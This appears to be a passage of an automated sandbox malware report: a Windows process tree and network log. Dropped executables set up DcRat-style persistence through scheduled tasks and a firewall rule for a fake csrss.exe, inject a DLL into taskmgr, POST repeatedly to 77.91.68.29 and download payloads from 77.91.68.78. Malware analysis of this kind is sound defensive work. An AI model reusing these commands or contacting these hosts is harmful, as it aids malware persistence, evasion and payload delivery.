C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6540.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:3120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:4296
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffaba1246f8,0x7ffaba124708,0x7ffaba124718
    3⤵
    PID:4776
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,8509594092170445324,16275715652479683615,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8
    3⤵
    PID:4784
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,8509594092170445324,16275715652479683615,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
    3⤵
    PID:3788
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,8509594092170445324,16275715652479683615,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
    3⤵
    PID:3684
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,8509594092170445324,16275715652479683615,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
    3⤵
    PID:2092
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,8509594092170445324,16275715652479683615,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
    3⤵
    PID:3184
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,8509594092170445324,16275715652479683615,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4000 /prefetch:1
    3⤵
    PID:536
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,8509594092170445324,16275715652479683615,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5404 /prefetch:1
    3⤵
    PID:1888
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,8509594092170445324,16275715652479683615,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
    3⤵
    PID:2976
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,8509594092170445324,16275715652479683615,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7160 /prefetch:1
    3⤵
    PID:2160
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,8509594092170445324,16275715652479683615,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6912 /prefetch:1
    3⤵
    PID:3800
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,8509594092170445324,16275715652479683615,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6796 /prefetch:1
    3⤵
    PID:1856
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,8509594092170445324,16275715652479683615,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:1
    3⤵
    PID:2288
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,8509594092170445324,16275715652479683615,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6544 /prefetch:1
    3⤵
    PID:4564
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,8509594092170445324,16275715652479683615,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6300 /prefetch:1
    3⤵
    PID:3592
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,8509594092170445324,16275715652479683615,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6296 /prefetch:1
    3⤵
    PID:1816
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,8509594092170445324,16275715652479683615,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6196 /prefetch:1
    3⤵
    PID:3252
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,8509594092170445324,16275715652479683615,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:1
    3⤵
    PID:3540
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,8509594092170445324,16275715652479683615,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1
    3⤵
    PID:1304
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4680
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaba1246f8,0x7ffaba124708,0x7ffaba124718
    3⤵
    PID:664
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,15680389214769862338,17548373631198735372,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 /prefetch:3
    3⤵
    PID:4956

C:\Users\Admin\AppData\Local\Temp\6F43.exe
C:\Users\Admin\AppData\Local\Temp\6F43.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:4484
- C:\Users\Admin\AppData\Local\Temp\ss41.exe
  "C:\Users\Admin\AppData\Local\Temp\ss41.exe"
  2⤵
  - Executes dropped EXE
  PID:4964
- C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
  "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
  2⤵
  - Executes dropped EXE
  PID:5080
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5540
- - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
    "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Checks for VirtualBox DLLs, possible anti-VM trick
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    PID:5204
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      PID:5212
  - - C:\Windows\system32\cmd.exe
      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      4⤵
      PID:4760
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:5632
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      PID:5680
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      PID:5872
  - - C:\Windows\rss\csrss.exe
      C:\Windows\rss\csrss.exe
      4⤵
      Executes dropped EXE
      PID:5112
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5136
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        DcRat
        Creates scheduled task(s)
        
        PID:2652
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        5⤵
        
        PID:2376
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Modifies data under HKEY_USERS
        
        PID:224
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:4764
    - - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        5⤵
        
        PID:1492
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        DcRat
        Creates scheduled task(s)
        
        PID:1596
- C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
  "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2384
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID:3688

C:\Users\Admin\AppData\Local\Temp\758E.exe
C:\Users\Admin\AppData\Local\Temp\758E.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3172
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3560

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:984

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1388

C:\Users\Admin\AppData\Local\Temp\7D6E.exe
C:\Users\Admin\AppData\Local\Temp\7D6E.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4496
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4840

Network

DNS

17.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

17.160.190.20.in-addr.arpa

IN PTR

Response
DNS

240.81.21.72.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.81.21.72.in-addr.arpa

IN PTR

Response
DNS

55.36.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

55.36.223.20.in-addr.arpa

IN PTR

Response
DNS

9.228.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

9.228.82.20.in-addr.arpa

IN PTR

Response
DNS

54.120.234.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

54.120.234.20.in-addr.arpa

IN PTR

Response
DNS

41.110.16.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

41.110.16.96.in-addr.arpa

IN PTR

Response

41.110.16.96.in-addr.arpa

IN PTR

a96-16-110-41deploystaticakamaitechnologiescom
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://umatgvgth.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 308
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 18:57:47 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://nbctml.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 175
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 18:57:47 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 49
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
DNS

29.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

29.68.91.77.in-addr.arpa

IN PTR

Response

29.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
DNS

50.23.12.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.23.12.20.in-addr.arpa

IN PTR

Response
DNS

56.126.166.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

56.126.166.20.in-addr.arpa

IN PTR

Response
DNS

254.111.26.67.in-addr.arpa

Remote address:

8.8.8.8:53

Request

254.111.26.67.in-addr.arpa

IN PTR

Response
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://cutmxhmyaf.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 233
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 18:58:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 45
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://bejoit.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 230
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 18:58:29 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 45
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xgwimuclg.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 175
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 18:58:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fppljbnd.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 249
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 18:58:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 54
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jhaesd.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 165
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 18:58:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xlsps.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 338
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 18:58:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ljufdcar.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 311
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 18:58:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 45
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://etyqq.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 126
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 18:58:32 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jeyamv.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 112
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 18:58:32 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 41
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://sdujygoucg.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 152
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 18:58:32 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://cehsuktyw.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 290
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 18:58:32 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 40
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://tglcuxf.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 120
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 18:58:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://oshata.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 182
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 18:58:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 41
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ggqtfs.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 348
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 18:58:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gcrhnxscr.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 301
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 18:58:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 41
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fgbtqtiecx.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 270
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 18:58:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
GET

http://77.91.68.78/lend/build.exe

Remote address:

77.91.68.78:80

Request

GET /lend/build.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.78

Response

HTTP/1.1 200 OK

Date: Mon, 18 Sep 2023 18:58:29 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sun, 10 Sep 2023 15:00:11 GMT
ETag: "55600-6050277656643"
Accept-Ranges: bytes
Content-Length: 349696
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET

http://77.91.68.78/lend/deluxe_crypted.exe

Remote address:

77.91.68.78:80

Request

GET /lend/deluxe_crypted.exe HTTP/1.1
Connection: Keep-Alive
